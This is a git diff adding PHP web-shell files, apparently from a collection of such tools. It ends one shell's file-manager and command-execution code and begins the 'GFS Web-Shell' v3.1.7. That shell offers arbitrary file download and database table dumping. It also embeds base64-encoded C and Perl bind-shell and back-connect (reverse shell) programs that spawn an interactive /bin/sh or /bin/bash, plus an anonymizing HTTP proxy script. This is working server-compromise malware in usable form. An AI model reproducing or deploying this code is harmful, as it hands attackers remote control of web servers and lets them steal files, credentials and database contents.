+	break;
+case 'rename':
+	if (!empty($_POST['destination'])) {
+		$dest = relative2absolute($_POST['destination'], $directory);
+		if (!@file_exists($dest) && @rename($file, $dest)) {
+			listing_page(notice('renamed', $file, $dest));
+		} else {
+			listing_page(error('not_renamed', $file, $dest));
+		}
+	} else {
+		$name = basename($file);
+		html_header();
+		echo '<form action="' . $self . '?tool=Files" method="post">
+<table class="dialog">
+<tr>
+<td class="dialog">
+	<input type="hidden" name="action" value="rename" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+	<b>' . word('rename_file') . '</b>
+	<p>' . html($file) . '</p>
+	<b>' . substr($file, 0, strlen($file) - strlen($name)) . '</b>
+	<input type="text" name="destination" size="' . textfieldsize($name) . '" value="' . html($name) . '" />
+	<hr />
+	<input type="submit" value="' . word('rename') . '" />
+</td>
+</tr>
+</table>
+<p><a href="' . $self . '?tool=Files&dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
+</form>
+';
+		html_footer();
+	}
+	break;
+case 'move':
+	if (!empty($_POST['destination'])) {
+		$dest = relative2absolute($_POST['destination'], $directory);
+		$failure = array();
+		$success = array();
+		foreach ($files as $file) {
+			$filename = substr($file, strlen($directory));
+			$d = $dest . $filename;
+			if (!@file_exists($d) && @rename($file, $d)) {
+				$success[] = $file;
+			} else {
+				$failure[] = $file;
+			}
+		}
+		$message = '';
+		if (sizeof($failure) > 0) {
+			$message = error('not_moved', implode("\n", $failure), $dest);
+		}
+		if (sizeof($success) > 0) {
+			$message .= notice('moved', implode("\n", $success), $dest);
+		}
+		listing_page($message);
+	} else {
+		html_header();
+		echo '<form action="' . $self . '?tool=Files" method="post">
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+		request_dump();
+		echo "\t<b>" . word('move_files') . '</b>
+	<p>
+';
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+		echo '	</p>
+	<hr />
+	' . word('destination') . ':
+	<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+	<input type="submit" value="' . word('move') . '" />
+</td>
+</tr>
+</table>
+<p><a href="' . $self . '?tool=Files&dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
+</form>
+';
+		html_footer();
+	}
+	break;
+case 'copy':
+	if (!empty($_POST['destination'])) {
+		$dest = relative2absolute($_POST['destination'], $directory);
+		if (@is_dir($dest)) {
+			$failure = array();
+			$success = array();
+			foreach ($files as $file) {
+				$filename = substr($file, strlen($directory));
+				$d = addslash($dest) . $filename;
+				if (!@is_dir($file) && !@file_exists($d) && @copy($file, $d)) {
+					$success[] = $file;
+				} else {
+					$failure[] = $file;
+				}
+			}
+			$message = '';
+			if (sizeof($failure) > 0) {
+				$message = error('not_copied', implode("\n", $failure), $dest);
+			}
+			if (sizeof($success) > 0) {
+				$message .= notice('copied', implode("\n", $success), $dest);
+			}
+			listing_page($message);
+		} else {
+			if (!@file_exists($dest) && @copy($file, $dest)) {
+				listing_page(notice('copied', $file, $dest));
+			} else {
+				listing_page(error('not_copied', $file, $dest));
+			}
+		}
+	} else {
+		html_header();
+		echo '<form action="' . $self . '?tool=Files" method="post">
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+		request_dump();
+		echo "\n<b>" . word('copy_files') . '</b>
+	<p>
+';
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+		echo '	</p>
+	<hr />
+	' . word('destination') . ':
+	<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+	<input type="submit" value="' . word('copy') . '" />
+</td>
+</tr>
+</table>
+<p><a href="' . $self . '?tool=Files&dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
+</form>
+';
+		html_footer();
+	}
+	break;
+case 'create_symlink':
+	if (!empty($_POST['destination'])) {
+		$dest = relative2absolute($_POST['destination'], $directory);
+		if (substr($dest, -1, 1) == $delim) $dest .= basename($file);
+		if (!empty($_POST['relative'])) $file = absolute2relative(addslash(dirname($dest)), $file);
+		if (!@file_exists($dest) && @symlink($file, $dest)) {
+			listing_page(notice('symlinked', $file, $dest));
+		} else {
+			listing_page(error('not_symlinked', $file, $dest));
+		}
+	} else {
+		html_header();
+		echo '<form action="' . $self . '?tool=Files" method="post">
+<table class="dialog" id="symlink">
+<tr>
+	<td style="vertical-align: top">' . word('destination') . ': </td>
+	<td>
+		<b>' . html($file) . '</b><br />
+		<input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked="checked" style="margin-top: 1ex" />
+		<label for="checkbox_relative">' . word('relative') . '</label>
+		<input type="hidden" name="action" value="create_symlink" />
+		<input type="hidden" name="file" value="' . html($file) . '" />
+		<input type="hidden" name="dir" value="' . html($directory) . '" />
+	</td>
+</tr>
+<tr>
+	<td>' . word('symlink') . ': </td>
+	<td>
+		<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+		<input type="submit" value="' . word('create_symlink') . '" />
+	</td>
+</tr>
+</table>
+<p><a href="' . $self . '?tool=Files&dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
+</form>
+';
+		html_footer();
+	}
+	break;
+case 'edit':
+	if (!empty($_POST['save'])) {
+		$content = str_replace("\r\n", "\n", $_POST['content']);
+		if (($f = @fopen($file, 'w')) && @fwrite($f, $content) !== false && @fclose($f)) {
+			listing_page(notice('saved', $file));
+		} else {
+			listing_page(error('not_saved', $file));
+		}
+	} else {
+		if (@is_readable($file) && @is_writable($file)) {
+			edit($file);
+		} else {
+			listing_page(error('not_edited', $file));
+		}
+	}
+	break;
+case 'permission':
+	if (!empty($_POST['set'])) {
+		$mode = 0;
+		if (!empty($_POST['ur'])) $mode |= 0400; if (!empty($_POST['uw'])) $mode |= 0200; if (!empty($_POST['ux'])) $mode |= 0100;
+		if (!empty($_POST['gr'])) $mode |= 0040; if (!empty($_POST['gw'])) $mode |= 0020; if (!empty($_POST['gx'])) $mode |= 0010;
+		if (!empty($_POST['or'])) $mode |= 0004; if (!empty($_POST['ow'])) $mode |= 0002; if (!empty($_POST['ox'])) $mode |= 0001;
+
+		if (@chmod($file, $mode)) {
+			listing_page(notice('permission_set', $file, decoct($mode)));
+		} else {
+			listing_page(error('permission_not_set', $file, decoct($mode)));
+		}
+	} else {
+		html_header();
+		$mode = fileperms($file);
+		echo '<form action="' . $self . '?tool=Files" method="post">
+<table class="dialog">
+<tr>
+<td class="dialog">
+	<p style="margin: 0">' . phrase('permission_for', $file) . '</p>
+	<hr />
+	<table id="permission">
+	<tr>
+		<td></td>
+		<td style="border-right: 1px solid black">' . word('owner') . '</td>
+		<td style="border-right: 1px solid black">' . word('group') . '</td>
+		<td>' . word('other') . '</td>
+	</tr>
+	<tr>
+		<td style="text-align: right">' . word('read') . ':</td>
+		<td><input type="checkbox" name="ur" value="1"'; if ($mode & 00400) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gr" value="1"'; if ($mode & 00040) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="or" value="1"'; if ($mode & 00004) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	<tr>
+		<td style="text-align: right">' . word('write') . ':</td>
+		<td><input type="checkbox" name="uw" value="1"'; if ($mode & 00200) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gw" value="1"'; if ($mode & 00020) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="ow" value="1"'; if ($mode & 00002) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	<tr>
+		<td style="text-align: right">' . word('execute') . ':</td>
+		<td><input type="checkbox" name="ux" value="1"'; if ($mode & 00100) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gx" value="1"'; if ($mode & 00010) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="ox" value="1"'; if ($mode & 00001) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	</table>
+	<hr />
+	<input type="submit" name="set" value="' . word('set') . '" />
+	<input type="hidden" name="action" value="permission" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+</td>
+</tr>
+</table>
+<p><a href="' . $self . '?tool=Files&dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
+</form>
+';
+		html_footer();
+	}
+	break;
+default:
+	listing_page();
+}
+
+exit;
+}
+echo '<table width="100%" border="0"><tr><td rowspan="1">';
+dirTKL ($dir);
+echo '</td><td align="right" valign="bottom" ><textarea rows="15" cols="100" >';
+if (!$function_tkl == ''){
+readFileTKL ($function_tkl,$pwd);
+}
+if (!$_POST['command'] == ''){
+exTKL ();
+}
+if ($_POST['function_tkl'] == 'mysql1'){
+echo $gaza_file;
+}
+fotTKL($gaza_text,$gaza_text1,$dir);
+?>
diff --git a/php/gfs_sh.php b/php/gfs_sh.php
new file mode 100644
index 0000000..dd6c601
--- /dev/null
+++ b/php/gfs_sh.php
@@ -0,0 +1,1575 @@
+<?
+/*
+*************************
+*  ###### ##### ######  *
+*  ###### ##### ######  *
+*  ##     ##    ##      *
+*  ##     ####  ######  *
+*  ##  ## ####  ######  *
+*  ##  ## ##        ##  *
+*  ###### ##    ######  *
+*  ###### ##    ######  *
+*                       *
+* Group Freedom Search! *
+*************************
+GFS Web-Shell
+*/
+error_reporting(0);
+if($_POST['b_down']){
+ $file=fopen($_POST['fname'],"r");
+ ob_clean();
+ $filename=basename($_POST['fname']);
+ $filedump=fread($file,filesize($_POST['fname']));
+ fclose($file);
+ header("Content-type: application/octet-stream");
+ header("Content-disposition: attachment; filename=\"".$filename."\";");
+ echo $filedump;
+ exit();
+}
+if($_POST['b_dtable']){
+ $dump=down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ if($dump!=""){
+  header("Content-type: application/octet-stream");
+  header("Content-disposition: attachment; filename=\"".$_POST['tablename'].".dmp\";");
+  echo down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+  exit();
+ }else
+  die("<b>Error dump!</b><br> table=".$_POST['tablename']."<br> db=".$_POST['dbname']."<br> host=".$_POST['host']."<br> user=".$_POST['username']."<br> pass=".$_POST['pass']);
+}
+set_magic_quotes_runtime(0);
+set_time_limit(0);
+ini_set('max_execution_time',0);
+ini_set('output_buffering',0);
+if(version_compare(phpversion(), '4.1.0')==-1){
+ $_POST=&$HTTP_POST_VARS;
+ $_GET=&$HTTP_GET_VARS;
+ $_SERVER=&$HTTP_SERVER_VARS;
+}
+if (get_magic_quotes_gpc()){
+ foreach ($_POST as $k=>$v){
+  $_POST[$k]=stripslashes($v);
+ }
+ foreach ($_SERVER as $k=>$v){
+  $_SERVER[$k]=stripslashes($v);
+ }
+}
+if ($_POST['username']==""){
+ $_POST['username']="root";
+}
+////////////////////////////////////////////////////////////////////////////////
+///////////////////////////// Ïåğåìåííûå ///////////////////////////////////////
+////////////////////////////////////////////////////////////////////////////////
+$server=$HTTP_SERVER_VARS['SERVER_SOFTWARE'];
+$r_act=$_POST['r_act'];
+$safe_mode=ini_get('safe_mode');               //ñòàòóñ áåçîïàñíîãî ğåæèìà
+$mysql_stat=function_exists('mysql_connect');  //Íàëè÷èå mysql
+$curl_on=function_exists('curl_version');      //íàëè÷èå cURL
+$dis_func=ini_get('disable_functions');        //çàáëîêèğîâàíûå ôóíêöèè
+$HTML=<<<html
+<html>
+<head>
+<title>GFS web-shell ver 3.1.7</title>
+</head>
+<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+html;
+$port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$prx1="IyEvaG9tZS9tZXJseW4vYmluL3BlcmwgLXcNCiMjIw0KIyMjaHR0cDovL2ZvcnVtLndlYi1oYWNrLnJ1L2luZGV4LnBocD9zaG93dG9waWM9
+MjY3MDYmc3Q9MCYjZW50cnkyNDYzNDQNCiMjIw0KDQp1c2Ugc3RyaWN0Ow0KJEVOVntQQVRIfSA9IGpvaW4gXCI6XCIsIHF3KC91c3IvdWNiIC9iaW4
+gL3Vzci9iaW4pOw0KJHwrKzsNCg0KIyMgQ29weXJpZ2h0IChjKSAxOTk2IGJ5IFJhbmRhbCBMLiBTY2h3YXJ0eg0KIyMgVGhpcyBwcm9ncmFtIGlzIG
+ZyZWUgc29mdHdhcmU7IHlvdSBjYW4gcmVkaXN0cmlidXRlIGl0DQojIyBhbmQvb3IgbW9kaWZ5IGl0IHVuZGVyIHRoZSBzYW1lIHRlcm1zIGFzIFBlc
+mwgaXRzZWxmLg0KDQojIyBBbm9ueW1vdXMgSFRUUCBwcm94eSAoaGFuZGxlcyBodHRwOiwgZ29waGVyOiwgZnRwOikNCiMjIHJlcXVpcmVzIExXUCA1
+LjA0IG9yIGxhdGVyDQoNCm15ICRIT1NUID0gXCJsb2NhbGhvc3RcIjsNCm15ICRQT1JUID0gXCI=";
+$prx2="XCI7DQoNCnN1YiBwcmVmaXggew0KIG15ICRub3cgPSBsb2NhbHRpbWU7DQoNCiBqb2luIFwiXCIsIG1hcCB7IFwiWyRub3ddIFskeyR9XSAk
+X1xcblwiIH0gc3BsaXQgL1xcbi8sIGpvaW4gXCJcIiwgQF87DQp9DQoNCiRTSUd7X19XQVJOX199ID0gc3ViIHsgd2FybiBwcmVmaXggQF8gfTsNCiR
+TSUd7X19ESUVfX30gPSBzdWIgeyBkaWUgcHJlZml4IEBfIH07DQokU0lHe0NMRH0gPSAkU0lHe0NITER9ID0gc3ViIHsgd2FpdDsgfTsNCg0KbXkgJE
+FHRU5UOyAgICMgZ2xvYmFsIHVzZXIgYWdlbnQgKGZvciBlZmZpY2llbmN5KQ0KQkVHSU4gew0KIHVzZSBMV1A6OlVzZXJBZ2VudDsNCg0KIEBNeUFnZ
+W50OjpJU0EgPSBxdyhMV1A6OlVzZXJBZ2VudCk7ICMgc2V0IGluaGVyaXRhbmNlDQoNCiAkQUdFTlQgPSBNeUFnZW50LT5uZXc7DQogJEFHRU5ULT5h
+Z2VudChcImFub24vMC4wN1wiKTsNCiAkQUdFTlQtPmVudl9wcm94eTsNCn0NCg0Kc3ViIE15QWdlbnQ6OnJlZGlyZWN0X29rIHsgMCB9ICMgcmVkaXJ
+lY3RzIHNob3VsZCBwYXNzIHRocm91Z2gNCg0KeyAgICAjIyMgTUFJTiAjIyMNCiB1c2UgSFRUUDo6RGFlbW9uOw0KDQogbXkgJG1hc3RlciA9IG5ldy
+BIVFRQOjpEYWVtb24NCiAgIExvY2FsQWRkciA9PiAkSE9TVCwgTG9jYWxQb3J0ID0+ICRQT1JUOw0KIHdhcm4gXCJzZXQgeW91ciBwcm94eSB0byA8V
+VJMOlwiLCAkbWFzdGVyLT51cmwsIFwiPlwiOw0KIG15ICRzbGF2ZTsNCiAmaGFuZGxlX2Nvbm5lY3Rpb24oJHNsYXZlKSB3aGlsZSAkc2xhdmUgPSAk
+bWFzdGVyLT5hY2NlcHQ7DQogZXhpdCAwOw0KfSAgICAjIyMgRU5EIE1BSU4gIyMjDQoNCnN1YiBoYW5kbGVfY29ubmVjdGlvbiB7DQogbXkgJGNvbm5
+lY3Rpb24gPSBzaGlmdDsgIyBIVFRQOjpEYWVtb246OkNsaWVudENvbm4NCg0KIG15ICRwaWQgPSBmb3JrOw0KIGlmICgkcGlkKSB7ICAgIyBzcGF3bi
+BPSywgYW5kIElcJ20gdGhlIHBhcmVudA0KICAgY2xvc2UgJGNvbm5lY3Rpb247DQogICByZXR1cm47DQogfQ0KICMjIHNwYXduIGZhaWxlZCwgb3IgS
+VwnbSBhIGdvb2QgY2hpbGQNCiBteSAkcmVxdWVzdCA9ICRjb25uZWN0aW9uLT5nZXRfcmVxdWVzdDsNCiBpZiAoZGVmaW5lZCgkcmVxdWVzdCkpIHsN
+CiAgIG15ICRyZXNwb25zZSA9ICZmZXRjaF9yZXF1ZXN0KCRyZXF1ZXN0KTsNCiAgICRjb25uZWN0aW9uLT5zZW5kX3Jlc3BvbnNlKCRyZXNwb25zZSk
+7DQogICBjbG9zZSAkY29ubmVjdGlvbjsNCiB9DQogZXhpdCAwIGlmIGRlZmluZWQgJHBpZDsgIyBleGl0IGlmIElcJ20gYSBnb29kIGNoaWxkIHdpdG
+ggYSBnb29kIHBhcmVudA0KfQ0KDQpzdWIgZmV0Y2hfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgICMgSFRUUDo6UmVxdWVzdA0KDQogd
+XNlIEhUVFA6OlJlc3BvbnNlOw0KDQogbXkgJHVybCA9ICRyZXF1ZXN0LT51cmw7DQogd2FybiBcImZldGNoaW5nICR1cmxcIjsNCiBpZiAoJHVybC0+
+c2NoZW1lICF+IC9eKGh0dHB8Z29waGVyfGZ0cCkkLykgew0KICAgbXkgJHJlcyA9IEhUVFA6OlJlc3BvbnNlLT5uZXcoNDAzLCBcIkZvcmJpZGRlblw
+iKTsNCiAgICRyZXMtPmNvbnRlbnQoXCJiYWQgc2NoZW1lOiBAe1skdXJsLT5zY2hlbWVdfVxcblwiKTsNCiAgICRyZXM7DQogfSBlbHNpZiAobm90IC
+R1cmwtPnJlbC0+bmV0bG9jKSB7DQogICBteSAkcmVzID0gSFRUUDo6UmVzcG9uc2UtPm5ldyg0MDMsIFwiRm9yYmlkZGVuXCIpOw0KICAgJHJlcy0+Y
+29udGVudChcInJlbGF0aXZlIFVSTCBub3QgcGVybWl0dGVkXFxuXCIpOw0KICAgJHJlczsNCiB9IGVsc2Ugew0KICAgJmZldGNoX3ZhbGlkYXRlZF9y
+ZXF1ZXN0KCRyZXF1ZXN0KTsNCiB9DQp9DQoNCnN1YiBmZXRjaF92YWxpZGF0ZWRfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgIyBIVFR
+QOjpSZXF1ZXN0DQoNCiAjIyB1c2VzIGdsb2JhbCAkQUdFTlQNCg0KICMjIHdhcm4gXCJvcmlnIHJlcXVlc3Q6IDw8PFwiLCAkcmVxdWVzdC0+aGVhZG
+Vyc19hc19zdHJpbmcsIFwiPj4+XCI7DQogJHJlcXVlc3QtPnJlbW92ZV9oZWFkZXIocXcoVXNlci1BZ2VudCBGcm9tIFJlZmVyZXIgQ29va2llKSk7D
+QogIyMgd2FybiBcImFub24gcmVxdWVzdDogPDw8XCIsICRyZXF1ZXN0LT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiBteSAkcmVzcG9uc2Ug
+PSAkQUdFTlQtPnJlcXVlc3QoJHJlcXVlc3QpOw0KICMjIHdhcm4gXCJvcmlnIHJlc3BvbnNlOiA8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N
+0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2UtPnJlbW92ZV9oZWFkZXIocXcoU2V0LUNvb2tpZSkpOw0KICMjIHdhcm4gXCJhbm9uIHJlc3BvbnNlOi
+A8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2U7DQp9";
+$port[1] = "tcpmux (TCP Port Service Multiplexer)";
+$port[2] = "Management Utility";
+$port[3] = "Compression Process";
+$port[5] = "rje (Remote Job Entry)";
+$port[7] = "echo";
+$port[9] = "discard";
+$port[11] = "systat";
+$port[13] = "daytime";
+$port[15] = "netstat";
+$port[17] = "quote of the day";
+$port[18] = "send/rwp";
+$port[19] = "character generator";
+$port[20] = "ftp-data";
+$port[21] = "ftp";
+$port[22] = "ssh, pcAnywhere";
+$port[23] = "Telnet";
+$port[25] = "SMTP (Simple Mail Transfer)";
+$port[27] = "ETRN (NSW User System FE)";
+$port[29] = "MSG ICP";
+$port[31] = "MSG Authentication";
+$port[33] = "dsp (Display Support Protocol)";
+$port[37] = "time";
+$port[38] = "RAP (Route Access Protocol)";
+$port[39] = "rlp (Resource Location Protocol)";
+$port[41] = "Graphics";
+$port[42] = "nameserv, WINS";
+$port[43] = "whois, nickname";
+$port[44] = "MPM FLAGS Protocol";
+$port[45] = "Message Processing Module [recv]";
+$port[46] = "MPM [default send]";
+$port[47] = "NI FTP";
+$port[48] = "Digital Audit Daemon";
+$port[49] = "TACACS, Login Host Protocol";
+$port[50] = "RMCP, re-mail-ck";
+$port[53] = "DNS";
+$port[57] = "MTP (any private terminal access)";
+$port[59] = "NFILE";
+$port[60] = "Unassigned";
+$port[61] = "NI MAIL";
+$port[62] = "ACA Services";
+$port[63] = "whois++";
+$port[64] = "Communications Integrator (CI)";
+$port[65] = "TACACS-Database Service";
+$port[66] = "Oracle SQL*NET";
+$port[67] = "bootps (Bootstrap Protocol Server)";
+$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)";
+$port[69] = "Trivial File Transfer Protocol (tftp)";
+$port[70] = "Gopher";
+$port[71] = "Remote Job Service";
+$port[72] = "Remote Job Service";
+$port[73] = "Remote Job Service";
+$port[74] = "Remote Job Service";
+$port[75] = "any private dial out service";
+$port[76] = "Distributed External Object Store";
+$port[77] = "any private RJE service";
+$port[78] = "vettcp";
+$port[79] = "finger";
+$port[80] = "World Wide Web HTTP";
+$port[81] = "HOSTS2 Name Serve";
+$port[82] = "XFER Utility";
+$port[83] = "MIT ML Device";
+$port[84] = "Common Trace Facility";
+$port[85] = "MIT ML Device";
+$port[86] = "Micro Focus Cobol";
+$port[87] = "any private terminal link";
+$port[88] = "Kerberos, WWW";
+$port[89] = "SU/MIT Telnet Gateway";
+$port[90] = "DNSIX Securit Attribute Token Map";
+$port[91] = "MIT Dover Spooler";
+$port[92] = "Network Printing Protocol";
+$port[93] = "Device Control Protocol";
+$port[94] = "Tivoli Object Dispatcher";
+$port[95] = "supdup";
+$port[96] = "DIXIE";
+$port[98] = "linuxconf";
+$port[99] = "Metagram Relay";
+$port[100] = "[unauthorized use]";
+$port[101] = "HOSTNAME";
+$port[102] = "ISO, X.400, ITOT";
+$port[103] = "Genesis Point-to-Point";
+$port[104] = "ACR-NEMA Digital Imag. & Comm. 300";
+$port[105] = "CCSO name server protocol";
+$port[106] = "poppassd";
+$port[107] = "Remote Telnet Service";
